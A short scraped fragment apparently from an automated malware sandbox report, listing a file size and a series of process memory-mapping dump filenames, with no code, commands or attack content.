                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/5548-411-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5628-496-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5724-427-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5736-497-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5764-498-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5828-482-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5844-483-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/6032-455-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/6068-489-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/6252-582-0x0000000000000000-mapping.dmp